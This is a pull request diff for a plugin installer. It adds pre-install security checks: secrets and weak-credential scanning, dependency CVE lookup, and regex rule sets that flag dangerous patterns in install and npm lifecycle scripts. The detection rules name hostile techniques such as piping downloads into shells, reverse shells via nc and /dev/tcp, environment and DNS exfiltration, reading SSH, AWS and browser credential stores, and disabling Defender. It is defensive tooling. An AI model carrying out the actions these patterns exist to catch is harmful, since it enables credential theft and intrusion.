### PR TITLE
feat: 安装前静态安全审计——弱凭据 + 危险模式规则集 + 组合引擎 + lifecycle 联合检测 + secrets 扫描 + 依赖 CVE 扫描

### DIFF
--- a/docs/FEEDBACK.md
+++ b/docs/FEEDBACK.md
@@ -84,7 +84,7 @@
 1. **注入净化**：CR/LF 统一、控制字符剔除、markdown 围栏 ``` → ''' （防击穿 details 折叠块）
 2. **已知密钥掩码**：云厂商（AWS 含临时凭证 ASIA 系、阿里云 LTAI、腾讯云 AKID、百度 bce-auth-v1）、sk 系（OpenAI/Anthropic）、GitHub（ghp_/PAT）、GitLab、Slack、npm、HuggingFace、Google（AIza/GOCSPX-）、LLM 聚合商（Groq/xAI/Perplexity/Fireworks/Cerebras，前缀取 secret-scanner 社区共识——官方不披露格式）、Cloudflare（cfut_/cfat_/cfk_）、Vercel（vcp_ 系）、Stripe（含 sk_org_）、Telegram bot、Discord bot 三段式、JWT 三段式、PEM 私钥块、DB 连接串（user:pass@）、Slack/Discord webhook、Bearer/Basic 头
 3. **用户路径**：`C:\Users\<name>\...` → `~\<user>\...`（保留深层结构，只隐藏用户名段）
-4. **上下文邻近**：`password:/token=/api_key=` 等关键词 + 分隔符 + 值 → 掩码（宽松策略：公开渠道默认拒绝，误掩码代价低漏报代价高）
+4. **上下文邻近**：`password:/token=/api_key=` 等关键词 + 分隔符 + 值 → 掩码（宽松策略：公开渠道默认拒绝，误掩码代价低漏报代价高）；**弱凭据值级检测**（admin/12345678/admin123 等 8+ 位默认密码，DeepSec L1 ai_pattern_default_password 同族）不因「纯小写无数字」放行
 5. **allowlist 压误报**：~30 停用词（example/placeholder/changeme…）+ 纯小写标识符（`error-module-not-found` 是包名不是密钥）不掩码
 
 掩码形态：`[AWS-REDACTED]` / `[JWT-REDACTED]` / `[REDACTED]`（上下文邻近）。

--- a/docs/FEEDBACK.md
+++ b/docs/FEEDBACK.md
@@ -89,6 +89,10 @@
 
 掩码形态：`[AWS-REDACTED]` / `[JWT-REDACTED]` / `[REDACTED]`（上下文邻近）。
 
+## 安装前 secrets 扫描（同规则面的第二用途）
+
+`findSecrets`（`lib/redact.js` 导出）复用「已知密钥 + 上下文邻近」两个低误报面（不含路径/Bearer/熵兜底——源码里误报率高），供 `scanCacheSecrets`（`lib/index.js`）在安装确认前遍历克隆缓存扫描硬编码凭据：只扫文本型扩展名与 `.env*` 基名文件，跳过 node_modules/.git/dist/build/vendor，文件数 200 / 单文件 512KB 上限。命中即在 `__confirm_secrets__` 弹窗亮出文件、行号与类别（**值经 redactLog 掩码展示**，弹窗文本永不携带密钥原文），用户可继续（示例/占位符）或取消（清缓存中止）。
+
 ## 隐私边界
 
 **收集**：插件元数据、安装方式、环境版本号（platform/Node/DSH/pnpm/git）、脱敏后的安装日志尾部。

--- a/docs/TESTING.md
+++ b/docs/TESTING.md
@@ -112,6 +112,8 @@ process.exit(fail === 0 ? 0 : 1);
 
 **findSecrets（安装前扫描复用面）**：同文件导出的结构化扫描（返回 `{line, kind, text}`），测试断言已知密钥/邻近命中行号、URL 不误报、maxHits 截断；集成层 `scanCacheSecrets` 断言目录遍历（node_modules 跳过/.env 基名命中/相对路径形态）、e2e 断言弹窗链路（值已脱敏 + continue/cancel 两分支）。
 
+**依赖 CVE 扫描（scanCacheVulnerabilities）**：`readVulnScanDeps` 纯函数断言扫描面（dependencies+optional，dev 不进）与版本解析（lockfile 精确优先/剥 ^~ 取下界）；集成层 mock fetch 断言 bulk API 命中（只收 critical/high）、moderate 不弹、网络失败与 API 非 200 静默降级、file: 协议读子包版本；e2e mock bulk URL 断言弹窗详情与 continue/cancel 双分支。
+
 ## 5. 端到端（e2e）策略
 
 e2e 用**本地 fixture 替代真实网络**，保证 CI 可复现：

--- a/docs/TESTING.md
+++ b/docs/TESTING.md
@@ -110,6 +110,8 @@ process.exit(fail === 0 ? 0 : 1);
 **新增密钥规则**：`lib/redact.js` KNOWN_KEY_RULES 加正则 + redact.test.mjs 加对应 noLeak 断言（成对维护）。
 性质测试的 sanitizeLog 不变式（路径残留/密钥残留/标记存在）是 fuzz 层兜底——粘连形态（多路径分隔符拼接）由它守护。
 
+**findSecrets（安装前扫描复用面）**：同文件导出的结构化扫描（返回 `{line, kind, text}`），测试断言已知密钥/邻近命中行号、URL 不误报、maxHits 截断；集成层 `scanCacheSecrets` 断言目录遍历（node_modules 跳过/.env 基名命中/相对路径形态）、e2e 断言弹窗链路（值已脱敏 + continue/cancel 两分支）。
+
 ## 5. 端到端（e2e）策略
 
 e2e 用**本地 fixture 替代真实网络**，保证 CI 可复现：

--- a/lib/index.js
+++ b/lib/index.js
@@ -1127,6 +1127,7 @@ const MESSAGES = {
     "npmScriptsDetected": "检测到第三方 npm 生命周期脚本（{scripts}），需要确认。",
     "qNpmScriptsHeader": "确认执行第三方 npm 脚本",
     "qNpmScripts": "仓库 {repo} 的 package.json 包含生命周期脚本：{scripts}。npm 安装依赖时会执行这些脚本，即运行第三方代码。是否允许执行？选择「不允许」将取消安装并清理所有痕迹。",
+    "qNpmScriptsHazards": "仓库 {repo} 的 package.json 包含生命周期脚本：{scripts}。静态扫描在这些脚本中发现危险 JS 模式：\n{hazards}\n是否允许执行？选择「不允许」将取消安装并清理所有痕迹。",
     "optAllow": "允许执行",
     "optAllowDesc": "信任该仓库，安装时执行其 npm 生命周期脚本",
     "optDeny": "不允许（取消安装）",
@@ -1313,6 +1314,7 @@ const MESSAGES = {
     "npmScriptsDetected": "Third-party npm lifecycle scripts detected ({scripts}) — confirmation required.",
     "qNpmScriptsHeader": "Confirm running third-party npm scripts",
     "qNpmScripts": "Repo {repo} has lifecycle scripts in package.json: {scripts}. npm will run these scripts while installing dependencies — that executes third-party code. Allow it? Choosing «No» cancels the install and cleans up all traces.",
+    "qNpmScriptsHazards": "Repo {repo} has lifecycle scripts in package.json: {scripts}. Static scan found dangerous JS patterns in these scripts:\n{hazards}\nAllow them? Choosing «No» cancels the install and cleans up all traces.",
     "optAllow": "Allow",
     "optAllowDesc": "Trust this repo and run its npm lifecycle scripts during install",
     "optDeny": "Deny (cancel install)",
@@ -2688,6 +2690,105 @@ function scriptHazardLangFor(filePath) {
   return (/\.ps1$/i).test(String(filePath ?? "")) ? "ps1" : "bash";
 }
 
+/**
+ * 危险模式白名单域名：`curl https://<域>/install.sh | sh` 是官方一键安装的
+ * 主流形态（rustup/nvm/oh-my-zsh 等）。**注意：不能完全放行**——恶意脚本同样
+ * 可托管在 raw.githubusercontent.com。策略：白名单命中时仅 severity 降级为
+ * medium（弱提示，弹窗仍展示），非白名单保持原严重度。
+ */
+const HAZARD_ALLOWLIST_DOMAINS = [
+  "raw.githubusercontent.com",
+  "github.com",
+  "get.docker.com",
+  "install.meteor.com",
+  "bootstrap.pypa.io",
+  "nodejs.org",
+  "deb.nodesource.com",
+  "npmjs.com",
+  "registry.npmjs.org",
+];
+
+/** 行内 URL 是否命中白名单域名。 */
+function hazardUrlAllowed(line) {
+  for (const domain of HAZARD_ALLOWLIST_DOMAINS) {
+    if (new RegExp(`https?://(?:[^/\\s]*\\.)?${domain.replaceAll(".", "\\.")}`, "i").test(line)) return true;
+  }
+  return false;
+}
+
+/**
+ * 组合规则（文件级第二遍）：单行模式抓不住的「信号 A + 信号 B 共现」攻击形态。
+ * 每条 = 两个信号正则，全文各命中一次即追加一条命中（行号取信号 A 首现行）。
+ * 语义来源：Grok 二轮调研 #22/#31/#44/#8（审计规则素材-Grok二轮.md 第二批清单）。
+ */
+const HAZARD_COMBO_PATTERNS = [
+  // 长随机串 且 同文件有解码执行调用（GuardDog exec-base64 组合语义）
+  { id: "combo-base64-literal-decode", category: "obfuscation", severity: "high",
+    a: /[A-Za-z0-9+/]{80,}={0,2}/, b: /\b(?:atob|base64\s+(?:-d|--decode)|Buffer\.from\([^)]*base64|FromBase64String)\b/i },
+  // env 全量序列化 且 网络外联（GuardDog npm-serialize-environment 组合）——单行形态常见
+  { id: "combo-env-dump-exfil", category: "exfil", severity: "critical", sameLine: true,
+    a: /(?:process\.env\b.*(?:JSON\.stringify|Object\.(?:keys|entries|values))|printenv|env\s*\|\s*)/i,
+    b: /(?:https?:\/\/|fetch\(|curl\s|wget\s|Invoke-WebRequest|iwr\s|requests\.post)/i },
+  // whoami/pwd 主机指纹拼进外联 URL（恶意包高频 #8）——单行形态常见
+  { id: "combo-fingerprint-exfil", category: "exfil", severity: "critical", sameLine: true,
+    a: /\$\(?\s*(?:whoami|pwd|hostname)\b/i,
+    b: /(?:https?:\/\/|curl\s|wget\s|nslookup\s|Invoke-RestMethod|irm\s)/i },
+  // DNS 外带：token 变量拼进 nslookup/Resolve-DnsName 查询（Grok #45/#46）——
+  // 单行形态（a/b 同行也算），与跨行组合规则不同
+  { id: "combo-dns-token", category: "exfil", severity: "high", sameLine: true,
+    a: /\b(?:nslookup|resolve-dnsname)\b/i,
+    b: /\$\{?\w*(?:TOKEN|KEY|SECRET|PASSWORD|PASS|CRED)/i },
+  // 下载产物直接执行（下载 + spawn/exec 同文件，Grok #9）——a/b 必须不同行（同行已被单行规则覆盖）
+  { id: "combo-download-spawn", category: "downloadExec", severity: "critical",
+    a: /\b(?:curl|wget|Invoke-WebRequest|iwr|irm|start-bitstransfer|bitsadmin)\b[^\n]*https?:\/\//i,
+    b: /(?:exec(?:Sync|File(?:Sync)?)?\s*\(|spawn(?:Sync)?\s*\(|Start-Process\b|(?:^|[;&])\s*&\s*(?:\$[A-Za-z_]|\/tmp\/)|invoke-expression\b|iex\b)/i },
+];
+
+/**
+ * JS/Lifecycle 恶意模式（package.json 联合检测，Grok 二轮任务 B Top 20 中 JS 侧）：
+ * 应用于 lifecycle 脚本命令文本与脚本指向的 JS 文件首层。
+ */
+const JS_HAZARD_PATTERNS = [
+  { id: "remote-eval", severity: "critical", category: "dynamicExec", re: /(?:https?\.(?:get|request)\s*\(|fetch\s*\(|request\s*\()[\s\S]{0,200}?\beval\s*\(/i },
+  { id: "eval-base64", severity: "critical", category: "obfuscation", re: /\beval\s*\([\s\S]{0,120}?(?:Buffer\.from\([^)]*base64|atob\s*\()/i },
+  { id: "childproc-silent", severity: "high", category: "dynamicExec", re: /(?:exec|spawn|execFile)\s*\(\s*[^)]*\{?[\s\S]{0,80}?stdio\s*:\s*['"]ignore['"]/i },
+  { id: "childproc-bracket-call", severity: "medium", category: "dynamicExec", re: /require\(['"]child_process['"]\)\[['"](?:exec|spawn|execFile|execSync)['"]\]/i },
+  { id: "env-dump", severity: "high", category: "credRead", re: /(?:JSON\.stringify\s*\(\s*process\.env|Object\.(?:keys|entries|values)\s*\(\s*process\.env)/i },
+  { id: "obfuscated-url", severity: "medium", category: "obfuscation", re: /['"][^'"]{20,}['"]\s*\+\s*['"][^'"]{20,}['"][\s\S]{0,120}?https?:\/\//i },
+];
+
+/**
+ * 扫描 npm lifecycle 脚本的恶意 JS 形态（package.json 联合检测）：
+ * 1) lifecycle 命令文本（`node setup.js` / `node -e "..."` 里的恶意模式）
+ * 2) lifecycle 指向的本地 JS 文件首层内容（setup.js/index.js 等）
+ * 返回 [{ script, category, severity, id, text }]，无命中返回 []。
+ */
+async function scanLifecycleHazards(cacheDir) {
+  const hits = [];
+  let pkg = null;
+  try { pkg = JSON.parse(await readFile(join(cacheDir, "package.json"), "utf8")); } catch { return hits; }
+  const scripts = pkg?.scripts ?? {};
+  const lifecycleNames = ["preinstall", "install", "postinstall", "prepare"];
+  for (const name of lifecycleNames) {
+    const cmd = typeof scripts[name] === "string" ? scripts[name] : "";
+    if (!cmd) continue;
+    // 1) 脚本命令文本扫描
+    for (const rule of JS_HAZARD_PATTERNS) {
+      if (rule.re.test(cmd)) hits.push({ script: name, category: rule.category, severity: rule.severity, id: rule.id, text: cmd.slice(0, 120) });
+    }
+    // 2) 命令里引用的本地 JS 文件首层内容（`node setup.js` / `node scripts/x.js`）
+    for (const m of cmd.matchAll(/node\s+([^\s&;|]+\.js)/g)) {
+      const target = join(cacheDir, m[1]);
+      let content;
+      try { content = await readFile(target, "utf8"); } catch { continue; }
+      for (const rule of JS_HAZARD_PATTERNS) {
+        if (rule.re.test(content)) hits.push({ script: name, category: rule.category, severity: rule.severity, id: rule.id, text: `${m[1]}: ${content.slice(0, 80)}` });
+      }
+    }
+  }
+  return hits;
+}
+
 async function scanScriptHazards(filePath) {
   const hits = [];
   try {
@@ -2699,8 +2800,26 @@ async function scanScriptHazards(filePath) {
       const line = lines[i];
       for (const rule of rules) {
         if (rule.re.test(line)) {
-          hits.push({ category: rule.category, line: i + 1, text: line.trim().slice(0, 120), id: rule.id, severity: rule.severity });
+          // downloadExec 类 + 行内 URL 命中白名单域名（官方一键安装形态）→
+          // severity 降级为 medium（弱提示，不消失——恶意脚本同样可托管在
+          // raw.githubusercontent.com，完全放行是安全漏洞）
+          const severity = rule.category === "downloadExec" && hazardUrlAllowed(line) ? "medium" : rule.severity;
+          hits.push({ category: rule.category, line: i + 1, text: line.trim().slice(0, 120), id: rule.id, severity });
           break; // 一行只记首个命中类别
+        }
+      }
+    }
+    // 第二遍：组合规则（单行扫描未满 8 条时才追加——防刷屏优先单行命中）。
+    // a/b 信号必须出现在不同行——同一行双信号已被单行规则覆盖，重复报无信息量。
+    if (hits.length < 8) {
+      for (const combo of HAZARD_COMBO_PATTERNS) {
+        if (hits.length >= 8) break;
+        const lineA = lines.findIndex((l) => combo.a.test(l));
+        const lineB = lines.findIndex((l) => combo.b.test(l));
+        // sameLine: true 允许同行（单行形态如 DNS 外带）；默认要求不同行（防单行规则重复报）
+        const sameLineOk = combo.sameLine === true ? lineA >= 0 && lineB >= 0 : lineA >= 0 && lineB >= 0 && lineA !== lineB;
+        if (sameLineOk) {
+          hits.push({ category: combo.category, line: lineA + 1, text: `[combo] ${combo.id}`, id: combo.id, severity: combo.severity });
         }
       }
     }
@@ -3903,17 +4022,26 @@ function apply(ctx) {
 
           // npm 生命周期脚本确认：cordis 插件若含 prepare/install/postinstall 等脚本，
           // 执行前必须征求用户同意（拒绝则取消安装并清空全部痕迹）。多插件根逐个汇总。
+          // 联合检测：lifecycle 命令/脚本文件命中 JS 恶意模式时，在弹窗亮出详情。
           if (type === "cordis-plugin" && answers.__confirm_npm_scripts__ === void 0) {
             const scripts = [...new Set((await Promise.all(pkgDirs.map((d) => readLifecycleScripts(d)))).flat())];
+            const jsHazards = (await Promise.all(pkgDirs.map((d) => scanLifecycleHazards(d)))).flat();
             if (scripts.length > 0) {
               logLine(t(langFull, "npmScriptsDetected", { scripts: scripts.join(", ") }));
+              const hazardsText = jsHazards.length > 0
+                ? jsHazards
+                    .map((h) => `  ${h.script}[${t(langFull, `hazard.${h.category}`)}] ${h.text}`)
+                    .join("\n")
+                : "";
               return json(res, 200, {
                 status: "awaiting-input",
                 repo, type,
                 questions: [{
                   id: "__confirm_npm_scripts__",
                   header: t(langFull, "qNpmScriptsHeader"),
-                  question: t(langFull, "qNpmScripts", { repo, scripts: scripts.join(", ") }),
+                  question: jsHazards.length > 0
+                    ? t(langFull, "qNpmScriptsHazards", { repo, scripts: scripts.join(", "), hazards: hazardsText })
+                    : t(langFull, "qNpmScripts", { repo, scripts: scripts.join(", ") }),
                   options: [
                     { value: "allow", label: t(langFull, "optAllow"), description: t(langFull, "optAllowDesc") },
                     { value: "deny", label: t(langFull, "optDeny"), description: t(langFull, "optDenyDesc") }
@@ -4516,5 +4644,5 @@ async function installRepo({ type, cacheDir, repo, log, answers, logLine, lang, 
   return { type, instructions: true };
 }
 
-export { apply, detectInstalled, detectSkillInstalled, loadOwnRepo, scanProfilePackages, langOf, t, fetchAllRepos, fetchRegistryRepos, getList, isTrustedRequest, isTrustedHost, isSensitiveEnvKey, buildMinimalEnv, buildFilteredEnv, compareVersions, shouldUpdate, hasPatchEntry, normalizeRepo, appendPatchEntry, removePatchEntry, readLifecycleScripts, sanitizeManifest, isPnpmLocalDependency, matchProfileEntry, normalizeRepoRef, loadOfficialPackages, isOfficialPackage, readPackageSummary, findSkillRoots, findPluginRoots, findPresetRoots, detectType, detectTypeDetail, parseGitmodulesUrls, scanCliInstallHint, scanExternalCliHint, findCliInstall, installNpmTargetToTemp, installRepo, saveInstalled, scanScriptHazards, classifyInstallFailure, sanitizeLog, buildFeedbackLogSnapshot, buildEnvProfile, queueFeedback, queueFeedbackSafe, readBundledIndex, dedupeReposByPkgName, needsPluginBuild, adaptorRedirectRepo, applyAdaptorList, ensureInstalledIndex, annotateInstalled, annotateSkillInstalled, safeAssign, hasInstalledRecord, wslPosixPath, slugify, SCRIPT_ENV_KEYS };
+export { apply, detectInstalled, detectSkillInstalled, loadOwnRepo, scanProfilePackages, langOf, t, fetchAllRepos, fetchRegistryRepos, getList, isTrustedRequest, isTrustedHost, isSensitiveEnvKey, buildMinimalEnv, buildFilteredEnv, compareVersions, shouldUpdate, hasPatchEntry, normalizeRepo, appendPatchEntry, removePatchEntry, readLifecycleScripts, sanitizeManifest, isPnpmLocalDependency, matchProfileEntry, normalizeRepoRef, loadOfficialPackages, isOfficialPackage, readPackageSummary, findSkillRoots, findPluginRoots, findPresetRoots, detectType, detectTypeDetail, parseGitmodulesUrls, scanCliInstallHint, scanExternalCliHint, findCliInstall, installNpmTargetToTemp, installRepo, saveInstalled, scanScriptHazards, classifyInstallFailure, sanitizeLog, buildFeedbackLogSnapshot, buildEnvProfile, queueFeedback, queueFeedbackSafe, readBundledIndex, dedupeReposByPkgName, needsPluginBuild, adaptorRedirectRepo, applyAdaptorList, ensureInstalledIndex, annotateInstalled, annotateSkillInstalled, safeAssign, hasInstalledRecord, wslPosixPath, slugify, SCRIPT_ENV_KEYS, scanLifecycleHazards };
 

--- a/lib/index.js
+++ b/lib/index.js
@@ -1102,6 +1102,10 @@ const MESSAGES = {
     "hazard.pathStartup": "写 PATH/启动项/持久化",
     "hazard.credRead": "读取凭据文件",
     "hazard.rcModify": "修改 shell 启动配置（rc/profile）",
+    "hazard.dynamicExec": "动态执行（eval/IEX 任意代码）",
+    "hazard.obfuscation": "混淆载荷（base64/十六进制编码执行）",
+    "hazard.exfil": "外泄通道（反向 shell/DNS·webhook 外带）",
+    "hazard.fileOps": "危险文件操作（递归删除/关防护）",
     "optContinue": "继续安装",
     "optContinueDesc": "信任该仓库并执行其安装脚本",
     "optCancel": "取消安装",
@@ -1284,6 +1288,10 @@ const MESSAGES = {
     "hazard.pathStartup": "writes PATH / autostart / persistence",
     "hazard.credRead": "reads credential files",
     "hazard.rcModify": "modifies shell startup config (rc/profile)",
+    "hazard.dynamicExec": "dynamic execution (eval/IEX arbitrary code)",
+    "hazard.obfuscation": "obfuscated payload (base64/hex-encoded execution)",
+    "hazard.exfil": "exfiltration channel (reverse shell / DNS·webhook beacon)",
+    "hazard.fileOps": "dangerous file ops (recursive delete / disable AV)",
     "optContinue": "Continue install",
     "optContinueDesc": "Trust this repo and run its install script",
     "optCancel": "Cancel install",
@@ -2594,69 +2602,104 @@ async function scanHostShadowDeps(dir) {
 
 /**
  * 安装脚本静态危险模式扫描（discussion #2269 承诺项，脚本确认弹窗叠加而非替代）：
- * 四类可机检模式——下载并执行 / 写 PATH·启动项·持久化 / 读凭据文件 / 改 shell rc。
+ * 按语言分表（bash / ps1）的规则集——下载执行 / 动态执行混淆 / 凭据读取 / 持久化 /
+ * 外泄组合五类，规则语义参考 ShellCheck SC 安全系列、PSScriptAnalyzer、Semgrep
+ * p/command-injection 与 GuardDog 启发式（2026-08 二轮调研，62 条模式精选落地）。
  * 返回命中行清单（category 为消息键后缀 hazard.*，每文件最多计入 8 行防刷屏）。
  */
-const SCRIPT_HAZARD_PATTERNS = [
-  {
-    category: "downloadExec",
-    patterns: [
-      /\bcurl\b[^\r\n|]*\|\s*(?:ba)?sh\b/i,
-      /\bwget\b[^\r\n|]*\|\s*(?:ba)?sh\b/i,
-      /\bcurl\b[^\r\n|]*\|\s*(?:python3?|perl|ruby)\b/i,
-      /\b(?:iwr|irm)\b[^\r\n|]*\|\s*(?:iex)\b/i,
-      /\bInvoke-WebRequest\b[^\r\n]*\|\s*Invoke-Expression\b/i,
-      /\biex\s*\(\s*(?:irm|iwr)\b/i
-    ]
-  },
-  {
-    category: "pathStartup",
-    patterns: [
-      /\bsetx\s+(?:\/m\s+)?path\b/i,
-      /\[Environment\]::SetEnvironmentVariable\(\s*["']Path["']/i,
-      /CurrentVersion\\Run/i,
-      /New-ItemProperty[^\r\n]*Run/i,
-      /\bStartup\\/i,
-      /\bschtasks\s*\/create/i,
-      /\bsystemctl\s+enable/i,
-      /\blaunchctl\s+load/i,
-      /\bcrontab\b/i
-    ]
-  },
-  {
-    category: "credRead",
-    patterns: [
-      /(?:~\/|\.ssh[\\/])(?:id_rsa|id_ed25519|id_ecdsa|known_hosts|config)\b/i,
-      /\.aws[\\/]credentials/i,
-      /\.npmrc/i,
-      /\.git-credentials/i,
-      /\.netrc/i,
-      /\bcmdkey\b/i,
-      /security\s+find-generic-password/i,
-      /(?:cat|Get-Content|gc|type)\s+[^\r\n|;&]*\.env\b/i,
-      /\bhosts\.yml\b/i
-    ]
-  },
-  {
-    category: "rcModify",
-    patterns: [
-      /(?:>>|Add-Content|tee\s+-a|Out-File\s+[^\r\n]*?-Append)\s+[^\r\n"'`]*\.(?:bashrc|zshrc|bash_profile|bash_aliases|profile|zprofile)\b/i,
-      /\$PROFILE\b/i,
-      /(?:PowerShell_profile|Microsoft\.PowerShell_profile)\.ps1/i
-    ]
-  }
+// 凭据路径/变量字典（bash 与 ps1 共享）：GuardDog exfil 启发式的读取面清单。
+const HAZARD_CRED_PATTERNS = [
+  { id: "read-aws-credentials", re: /(?:\.aws[\\/]credentials|AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY)/i, severity: "critical" },
+  { id: "read-ssh-key", re: /(?:\.ssh[\\/])?id_(?:rsa|ed25519|ecdsa)(?:\.pub)?\b/i, severity: "critical" },
+  { id: "read-docker-config", re: /\.docker[\\/]config\.json\b/i, severity: "high" },
+  { id: "read-kube-config", re: /\.kube[\\/]config\b/i, severity: "high" },
+  { id: "read-npmrc-token", re: /(?:\.npmrc\b|_authToken|NPM_TOKEN)/i, severity: "high" },
+  { id: "read-git-credentials", re: /(?:\.git-credentials|GIT_ASKPASS)/i, severity: "high" },
+  // 浏览器密码库（信息窃取样本高频面）
+  { id: "browser-password-db", re: /(?:Login Data|Web Data|logins\.json|key4\.db|cookies\.sqlite)/i, severity: "critical" },
+  { id: "windows-credential-manager", re: /(?:\bcmdkey\b|\bvaultcmd\b|CredentialManager)/i, severity: "high" },
 ];
+
+/** 单行危险模式表。severity 仅作展示分级依据；每条命中独立计数。 */
+const SCRIPT_HAZARD_PATTERNS = {
+  bash: [
+    // ---- 下载执行（critical）----
+    { id: "curl-pipe-shell", severity: "critical", category: "downloadExec", re: /\b(?:curl|wget|fetch)\b[^\n|;]*\|\s*(?:sudo\s+)?(?:ba|z|da|a|k)?sh\b/i },
+    { id: "curl-pipe-python", severity: "critical", category: "downloadExec", re: /\b(?:curl|wget)\b[^\n|;]*\|\s*(?:sudo\s+)?python[23]?\b/i },
+    { id: "bash-c-curl-subshell", severity: "critical", category: "downloadExec", re: /\b(?:ba|z)?sh\s+-c\s+["']?\$\((?:curl|wget)\b/i },
+    { id: "eval-curl-subshell", severity: "critical", category: "downloadExec", re: /\beval\s+["']?\$\((?:curl|wget)\b/i },
+    { id: "process-substitution-bash", severity: "critical", category: "downloadExec", re: /\b(?:ba|z)?sh\s+<\((?:curl|wget)\b/i },
+    { id: "base64-decode-pipe-sh", severity: "critical", category: "obfuscation", re: /\b(?:echo|printf)\s+[A-Za-z0-9+/=]{40,}\s*\|\s*base64\s+(?:-d|--decode)\s*\|\s*(?:ba|z)?sh\b/i },
+    { id: "node-e-eval-base64", severity: "critical", category: "obfuscation", re: /\bnode\s+(?:-e|--eval)\s+["'].*(?:eval|Function)\s*\(.*(?:Buffer\.from|atob|base64)/i },
+    // ---- 动态执行 / 混淆（high）----
+    { id: "bare-eval", severity: "high", category: "dynamicExec", re: /\beval\s+["'`$]/ },
+    { id: "hex-escape-string", severity: "medium", category: "obfuscation", re: /(?:\\x[0-9a-f]{2}){8,}/ },
+    // ---- 凭据读取（共享字典 + shell 特有）----
+    ...HAZARD_CRED_PATTERNS.map((p) => ({ ...p, category: "credRead" })),
+    { id: "printenv-pipe-net", severity: "high", category: "exfil", re: /\b(?:printenv|env)\b[^\n|;]*\|\s*(?:curl|wget|nc|ncat)\b/i },
+    // ---- 持久化 / 启动配置 ----
+    { id: "crontab-add-run", severity: "high", category: "pathStartup", re: /\bcrontab\b/i },
+    { id: "systemctl-enable", severity: "high", category: "pathStartup", re: /\bsystemctl\s+enable\b/i },
+    { id: "launchagent-plist", severity: "high", category: "pathStartup", re: /Launch(?:Agents|Daemons)[^\n]*\.plist/i },
+    // rc/profile 写入（旧表保留——安装脚本改 shell 启动配置是持久化前奏）
+    { id: "rc-file-append", severity: "medium", category: "rcModify", re: /(?:>>|Add-Content|tee\s+-a|Out-File\s+[^\r\n]*?-Append)\s+[^\r\n"'`]*\.(?:bashrc|zshrc|bash_profile|bash_aliases|profile|zprofile)\b/i },
+    // ---- 外泄组合 ----
+    { id: "nc-reverse-shell", severity: "critical", category: "exfil", re: /\b(?:nc|ncat|netcat)\b[^\n]*(?:-e\s|\/bin\/(?:ba)?sh)/ },
+    { id: "bash-dev-tcp", severity: "critical", category: "exfil", re: /\/dev\/tcp\/[0-9.]+\/[0-9]+/ },
+    { id: "webhook-exfil-url", severity: "high", category: "exfil", re: /https:\/\/[^\s]*(?:hooks\.slack\.com\/services|discord\.com\/api\/webhooks)/i },
+    // ---- 危险文件操作 ----
+    { id: "find-exec-rm", severity: "high", category: "fileOps", re: /\bfind\b[^\n]*-exec\s+rm\b/i },
+    // Windows 交叉（install.sh 也可能写注册表/PATH）
+    { id: "setx-path", severity: "medium", category: "pathStartup", re: /\bsetx\s+(?:\/m\s+)?path\b/i },
+  ],
+  ps1: [
+    // ---- 下载执行（critical）----
+    { id: "iex-iwr", severity: "critical", category: "downloadExec", re: /\b(?:iex|invoke-expression)\s*\(?\s*(?:iwr|invoke-webrequest|irm|invoke-restmethod)\b/i },
+    // 管道形态（irm|iwr|Invoke-WebRequest … | iex）与子表达形态双覆盖
+    { id: "download-pipe-iex", severity: "critical", category: "downloadExec", re: /\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|curl)\b[^\n|;]*\|\s*(?:iex|invoke-expression)\b/i },
+    { id: "iex-downloadstring", severity: "critical", category: "downloadExec", re: /\b(?:iex|invoke-expression)\s*\(?\s*\(?\s*(?:new-object\s+)?(?:net\.|system\.net\.)?webclient\)?\.downloadstring/i },
+    { id: "powershell-encodedcommand", severity: "critical", category: "obfuscation", re: /\bpowershell(?:\.exe)?\b[^\n]*-(?:e(?:nc(?:odedcommand)?)?)\s+[A-Za-z0-9+/=]{20,}/i },
+    { id: "bitsadmin-transfer", severity: "high", category: "downloadExec", re: /\b(?:bitsadmin|start-bitstransfer)\b[^\n]*https?:\/\//i },
+    { id: "certutil-urlcache", severity: "high", category: "downloadExec", re: /\bcertutil\s+(?:-urlcache|-decode)\b/i },
+    // ---- 动态执行 / 混淆 ----
+    { id: "iex-any", severity: "high", category: "dynamicExec", re: /\b(?:invoke-expression|iex)\b/i },
+    { id: "dot-source-remote", severity: "high", category: "downloadExec", re: /\.\s+["']?https?:\/\//i },
+    // ---- 凭据读取（共享字典 + PS 特有）----
+    ...HAZARD_CRED_PATTERNS.map((p) => ({ ...p, category: "credRead" })),
+    { id: "read-env-file-ps", severity: "medium", category: "credRead", re: /(?:Get-Content|gc|type)\s+[^\n|;&]*\.env\b/i },
+    // ---- 持久化 ----
+    { id: "schtasks-create", severity: "critical", category: "pathStartup", re: /\bschtasks\s+\/create\b/i },
+    { id: "register-scheduled-job", severity: "high", category: "pathStartup", re: /\bregister-scheduled(?:job|task)\b|\bnew-scheduledtask\b/i },
+    { id: "sc-create-service", severity: "critical", category: "pathStartup", re: /\bsc(?:\.exe)?\s+create\b/i },
+    { id: "wmi-event-subscription", severity: "critical", category: "pathStartup", re: /(?:__EventFilter|CommandLineEventConsumer|FilterToConsumerBinding)/ },
+    { id: "startup-folder-write", severity: "high", category: "pathStartup", re: /Start Menu\\Programs\\Startup/i },
+    { id: "registry-run-key", severity: "critical", category: "pathStartup", re: /CurrentVersion\\Run(?:Once)?\b/i },
+    { id: "setx-path", severity: "high", category: "pathStartup", re: /\bsetx\s+(?:\/m\s+)?path\b/i },
+    { id: "setenv-var-path", severity: "high", category: "pathStartup", re: /\[Environment\]::SetEnvironmentVariable\(\s*["']Path["']/i },
+    { id: "run-key-new-itemproperty", severity: "critical", category: "pathStartup", re: /New-ItemProperty[^\n]*Run/i },
+    { id: "set-executionpolicy-bypass", severity: "high", category: "dynamicExec", re: /\bset-executionpolicy\s+[^\n]*(?:bypass|unrestricted)/i },
+    { id: "disable-defender", severity: "critical", category: "fileOps", re: /\bset-mppreference\b[^\n]*(?:-disablerealtime|-exclusionpath)/i },
+    { id: "remove-item-force-recurse", severity: "medium", category: "fileOps", re: /\bremove-item\s+[^\n]*-recurse[^\n]*-force/i },
+  ],
+};
+
+/** 语言路由：按文件名后缀选规则表；未知后缀用 bash 表（保守）。 */
+function scriptHazardLangFor(filePath) {
+  return (/\.ps1$/i).test(String(filePath ?? "")) ? "ps1" : "bash";
+}
 
 async function scanScriptHazards(filePath) {
   const hits = [];
   try {
     const content = await readFile(filePath, "utf8");
+    const lang = scriptHazardLangFor(filePath);
+    const rules = SCRIPT_HAZARD_PATTERNS[lang];
     const lines = content.split(/\r?\n/);
     for (let i = 0; i < lines.length && hits.length < 8; i++) {
       const line = lines[i];
